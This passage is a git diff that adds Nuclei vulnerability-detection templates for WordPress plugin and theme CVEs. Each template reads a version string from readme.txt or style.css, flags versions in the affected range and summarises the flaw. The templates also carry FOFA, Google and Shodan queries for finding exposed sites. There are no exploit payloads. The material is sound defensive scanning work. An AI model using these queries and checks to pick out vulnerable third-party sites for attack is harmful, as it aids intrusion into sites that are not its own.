https://www.wordfence.com/threat-intel/vulnerabilities/id/09ac7546-0572-4446-99f7-fe84f76fac9b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-43972 + metadata: + fofa-query: "wp-content/plugins/pagelayer/" + google-query: inurl:"/wp-content/plugins/pagelayer/" + shodan-query: 'vuln:CVE-2024-43972' + tags: cve,wordpress,wp-plugin,pagelayer,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/pagelayer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "pagelayer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.7') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43973.yaml b/nuclei-templates/CVE-2024/CVE-2024-43973.yaml new file mode 100644 index 0000000000..034a54f85c --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43973.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43973 + +info: + name: > + GetPaid <= 2.8.11 - Missing Authorization via column_subscription() + author: topscoder + severity: low + description: > + The GetPaid plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the column_subscription() function in versions up to, and including, 2.8.11. This makes it possible for authenticated attackers, with contributor-level access and above, to access backend pages from the plugin. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/63ab02c1-baeb-4fd1-a527-4287d0b17a03?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43973 + metadata: + fofa-query: "wp-content/plugins/invoicing/" + google-query: inurl:"/wp-content/plugins/invoicing/" + shodan-query: 'vuln:CVE-2024-43973' + tags: cve,wordpress,wp-plugin,invoicing,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/invoicing/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "invoicing" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.11') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43974.yaml b/nuclei-templates/CVE-2024/CVE-2024-43974.yaml new file mode 100644 index 0000000000..77bb5cabc4 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43974.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43974 + +info: + name: > + ReviveNews <= 1.0.2 - Missing Authorization via revivenews_install_and_activate_plugins() + author: topscoder + severity: high + description: > + The ReviveNews theme for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the revivenews_install_and_activate_plugins() function in versions up to, and including, 1.0.2. This makes it possible for unauthenticated attackers to install and activate plugins. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/19db591b-1e59-4ff7-b339-bea869083bbc?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43974 + metadata: + fofa-query: "wp-content/themes/revivenews/" + google-query: inurl:"/wp-content/themes/revivenews/" + shodan-query: 'vuln:CVE-2024-43974' + tags: cve,wordpress,wp-theme,revivenews,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/revivenews/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "revivenews" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.2') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43975.yaml b/nuclei-templates/CVE-2024/CVE-2024-43975.yaml new file mode 100644 index 0000000000..0885bfbd7b --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43975.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43975 + +info: + name: > + Super Store Finder <= 6.9.7 - Unauthenticated Stored Cross-Site Scripting + author: topscoder + severity: high + description: > + The Super Store Finder plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 6.9.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5cba9501-2eb1-4702-889c-d0f4777e72e9?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cve-id: CVE-2024-43975 + metadata: + fofa-query: "wp-content/plugins/superstorefinder-wp/" + google-query: inurl:"/wp-content/plugins/superstorefinder-wp/" + shodan-query: 'vuln:CVE-2024-43975' + tags: cve,wordpress,wp-plugin,superstorefinder-wp,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/superstorefinder-wp/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "superstorefinder-wp" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.9.7') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43976.yaml b/nuclei-templates/CVE-2024/CVE-2024-43976.yaml new file mode 100644 index 0000000000..01ccee5511 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43976.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43976 + +info: + name: > + Super Store Finder <= 6.9.7 - Authenticated (Subscriber+) SQL Injection + author: topscoder + severity: low + description: > + The Super Store Finder plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 6.9.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/28e4cc53-53c3-47bf-8ea4-818040d10abd?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.9 + cve-id: CVE-2024-43976 + metadata: + fofa-query: "wp-content/plugins/superstorefinder-wp/" + google-query: inurl:"/wp-content/plugins/superstorefinder-wp/" + shodan-query: 'vuln:CVE-2024-43976' + tags: cve,wordpress,wp-plugin,superstorefinder-wp,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/superstorefinder-wp/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "superstorefinder-wp" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.9.7') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43977.yaml b/nuclei-templates/CVE-2024/CVE-2024-43977.yaml new file mode 100644 index 0000000000..6b8f9be5c9 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43977.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43977 + +info: + name: > + The Plus Addons for Elementor Page Builder Lite <= 5.6.2 - Authenticated (Author+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The The Plus Addons for Elementor Page Builder Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 5.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a4fdfc83-cce9-4c87-88f2-331be081b32c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43977 + metadata: + fofa-query: "wp-content/plugins/the-plus-addons-for-elementor-page-builder/" + google-query: inurl:"/wp-content/plugins/the-plus-addons-for-elementor-page-builder/" + shodan-query: 'vuln:CVE-2024-43977' + tags: cve,wordpress,wp-plugin,the-plus-addons-for-elementor-page-builder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/the-plus-addons-for-elementor-page-builder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "the-plus-addons-for-elementor-page-builder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.6.2') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43978.yaml b/nuclei-templates/CVE-2024/CVE-2024-43978.yaml new file mode 100644 index 0000000000..cd5ef7a52d --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43978.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43978 + +info: + name: > + Super Store Finder <= 6.9.7 - Unauthenticated SQL Injection + author: topscoder + severity: critical + description: > + The Super Store Finder plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 6.9.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8df5c412-e995-411f-94a9-afd7f9941125?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2024-43978 + metadata: + fofa-query: "wp-content/plugins/superstorefinder-wp/" + google-query: inurl:"/wp-content/plugins/superstorefinder-wp/" + shodan-query: 'vuln:CVE-2024-43978' + tags: cve,wordpress,wp-plugin,superstorefinder-wp,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/superstorefinder-wp/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "superstorefinder-wp" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.9.7') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43979.yaml b/nuclei-templates/CVE-2024/CVE-2024-43979.yaml new file mode 100644 index 0000000000..65909acd75 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43979.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43979 + +info: + name: > + Blockbooster <= 1.0.10 - Missing Authorization + author: topscoder + severity: high + description: > + The Blockbooster theme for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the blockbooster_dismissble_notice() and blockbooster_install_and_activate_plugins() functions in versions up to, and including, 1.0.10. This makes it possible for unauthenticated attackers to dismiss admin notices and install and activate plugins. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6387f210-ed4f-4f98-9e16-30f80c2889a2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43979 + metadata: + fofa-query: "wp-content/themes/blockbooster/" + google-query: inurl:"/wp-content/themes/blockbooster/" + shodan-query: 'vuln:CVE-2024-43979' + tags: cve,wordpress,wp-theme,blockbooster,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/blockbooster/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "blockbooster" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.10') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43980.yaml b/nuclei-templates/CVE-2024/CVE-2024-43980.yaml new file mode 100644 index 0000000000..6805a69a09 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43980.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43980 + +info: + name: > + Fota WP <= 1.4.1 - Missing Authorization via fotawp_install_and_activate_plugins() + author: topscoder + severity: high + description: > + The Fota WP theme for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the fotawp_install_and_activate_plugins() function in versions up to, and including, 1.4.1. This makes it possible for unauthenticated attackers to install and activate plugins. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/95ca322f-3965-4635-8cbd-8764205d7928?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43980 + metadata: + fofa-query: "wp-content/themes/fotawp/" + google-query: inurl:"/wp-content/themes/fotawp/" + shodan-query: 'vuln:CVE-2024-43980' + tags: cve,wordpress,wp-theme,fotawp,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/fotawp/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "fotawp" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.1') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43981.yaml b/nuclei-templates/CVE-2024/CVE-2024-43981.yaml new file mode 100644 index 0000000000..1de7ee4993 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43981.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43981 + +info: + name: > + GeoDirectory <= 2.3.70 - Missing Authorization via geodirectory_rated() + author: topscoder + severity: low + description: > + The GeoDirectory plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the geodirectory_rated() function in versions up to, and including, 2.3.70. This makes it possible for authenticated attackers, with subscriber-level access and above, to set the 'geodirectory_admin_footer_text_rated' option value to true. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8f687ee4-9760-48dd-9427-853de877dacc?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43981 + metadata: + fofa-query: "wp-content/plugins/geodirectory/" + google-query: inurl:"/wp-content/plugins/geodirectory/" + shodan-query: 'vuln:CVE-2024-43981' + tags: cve,wordpress,wp-plugin,geodirectory,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/geodirectory/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "geodirectory" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.70') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43982.yaml b/nuclei-templates/CVE-2024/CVE-2024-43982.yaml new file mode 100644 index 0000000000..1a1a01f7fd --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43982.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43982 + +info: + name: > + Login As Users <= 1.4.3 - Missing Authorization to Privielge Escalation via Account Takeover + author: topscoder + severity: low + description: > + The Login As Users plugin for WordPress is vulnerable to privilege escalation due to a missing capability check on the gwslau_login_as_user_action() function in versions up to, and including, 1.4.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to log in as other users like site administrators. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/88d9f0b1-040d-4f95-95dd-021ceb0cdb39?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-43982 + metadata: + fofa-query: "wp-content/plugins/login-as-users/" + google-query: inurl:"/wp-content/plugins/login-as-users/" + shodan-query: 'vuln:CVE-2024-43982' + tags: cve,wordpress,wp-plugin,login-as-users,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/login-as-users/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "login-as-users" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.3') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43983.yaml b/nuclei-templates/CVE-2024/CVE-2024-43983.yaml new file mode 100644 index 0000000000..3262802128 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43983.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43983 + +info: + name: > + Podlove Podcast Publisher <= 4.1.13 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Podlove Podcast Publisher plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 4.1.13 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/64b7985e-bb35-4648-8159-4424661b52a9?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43983 + metadata: + fofa-query: "wp-content/plugins/podlove-podcasting-plugin-for-wordpress/" + google-query: inurl:"/wp-content/plugins/podlove-podcasting-plugin-for-wordpress/" + shodan-query: 'vuln:CVE-2024-43983' + tags: cve,wordpress,wp-plugin,podlove-podcasting-plugin-for-wordpress,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/podlove-podcasting-plugin-for-wordpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "podlove-podcasting-plugin-for-wordpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.13') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43984.yaml b/nuclei-templates/CVE-2024/CVE-2024-43984.yaml new file mode 100644 index 0000000000..8e5e68834e --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43984.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43984 + +info: + name: > + Podlove Podcast Publisher <= 4.1.13 - Cross-Site Request Forgery to Remote Code Execution + author: topscoder + severity: medium + description: > + The Podlove Podcast Publisher plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.1.13. This is due to missing or incorrect nonce validation on the 'get', 'update', 'create', and 'delete' functions. This makes it possible for unauthenticated attackers to modify templates and achieve remote code execution via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/289c9759-f4d3-4b42-9f90-12ea43bbafad?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-43984 + metadata: + fofa-query: "wp-content/plugins/podlove-podcasting-plugin-for-wordpress/" + google-query: inurl:"/wp-content/plugins/podlove-podcasting-plugin-for-wordpress/" + shodan-query: 'vuln:CVE-2024-43984' + tags: cve,wordpress,wp-plugin,podlove-podcasting-plugin-for-wordpress,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/podlove-podcasting-plugin-for-wordpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "podlove-podcasting-plugin-for-wordpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.13') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43985.yaml b/nuclei-templates/CVE-2024/CVE-2024-43985.yaml new file mode 100644 index 0000000000..7f99c53d55 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43985.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43985 + +info: + name: > + Bus Ticket Booking with Seat Reservation <= 5.3.5 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Bus Ticket Booking with Seat Reservation plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 5.3.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only impacts multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ffc92f28-02bd-48b3-b803-b67feab74db2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-43985 + metadata: + fofa-query: "wp-content/plugins/bus-ticket-booking-with-seat-reservation/" + google-query: inurl:"/wp-content/plugins/bus-ticket-booking-with-seat-reservation/" + shodan-query: 'vuln:CVE-2024-43985' + tags: cve,wordpress,wp-plugin,bus-ticket-booking-with-seat-reservation,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bus-ticket-booking-with-seat-reservation/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bus-ticket-booking-with-seat-reservation" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.3.5') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43999.yaml b/nuclei-templates/CVE-2024/CVE-2024-43999.yaml new file mode 100644 index 0000000000..0d75f65cad --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43999.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43999 + +info: + name: > + Ninja Forms <= 3.8.11 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Ninja Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.8.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only impacts multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8c6f5f8c-7a8c-4524-8cb8-e14a6f182bbf?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-43999 + metadata: + fofa-query: "wp-content/plugins/ninja-forms/" + google-query: inurl:"/wp-content/plugins/ninja-forms/" + shodan-query: 'vuln:CVE-2024-43999' + tags: cve,wordpress,wp-plugin,ninja-forms,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ninja-forms/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ninja-forms" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.8.11') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-5309.yaml b/nuclei-templates/CVE-2024/CVE-2024-5309.yaml new file mode 100644 index 0000000000..a46de7a0c3 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-5309.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5309 + +info: + name: > + Form Vibes – Database Manager for Forms <= 1.4.12 - Missing Authorization in Multiple Functions + author: topscoder + severity: low + description: > + The Form Vibes – Database Manager for Forms plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a missing capability check on the fv_export_csv, reset_settings, save_settings, save_columns_settings, get_analytics_data, get_event_logs_data, delete_submissions, and get_submissions functions in all versions up to, and including, 1.4.12. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform multiple unauthorized actions. NOTE: This vulnerability is partially fixed in version 1.4.12. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/aba88c4c-93a4-4c1c-b239-68b5fec87146?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2024-5309 + metadata: + fofa-query: "wp-content/plugins/form-vibes/" + google-query: inurl:"/wp-content/plugins/form-vibes/" + shodan-query: 'vuln:CVE-2024-5309' + tags: cve,wordpress,wp-plugin,form-vibes,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/form-vibes/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "form-vibes" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.12') \ No newline at end of file diff --git a/nuclei-templates/Other/wordpress-registration-enabled.yaml b/nuclei-templates/CVE-2024/CVE-2024-6088.yaml similarity index 100% rename from nuclei-templates/Other/wordpress-registration-enabled.yaml rename to nuclei-templates/CVE-2024/CVE-2024-6088.yaml diff --git a/nuclei-templates/CVE-2024/CVE-2024-6332.yaml b/nuclei-templates/CVE-2024/CVE-2024-6332.yaml new file mode 100644 index 0000000000..0dadeed959 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-6332.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6332 + +info: + name: > + Booking for Appointments and Events Calendar – Amelia Premium <= 7.7 and Lite <= 1.2.3 - Missing Authorization to Sensitive Information Exposure + author: topscoder + severity: high + description: > + The Booking for Appointments and Events Calendar – Amelia Premium and Lite plugins for WordPress are vulnerable to unauthorized access of data due to a missing capability check on the 'ameliaButtonCommand' function in all versions up to, and including, Premium 7.7 and Lite 1.2.3. This makes it possible for unauthenticated attackers to access employee calendar details, including Google Calendar OAuth tokens in the premium version. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2ac1e3ee-4dcc-4f45-ad07-17af750da3d1?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 + cve-id: CVE-2024-6332 + metadata: + fofa-query: "wp-content/plugins/ameliabooking/" + google-query: inurl:"/wp-content/plugins/ameliabooking/" + shodan-query: 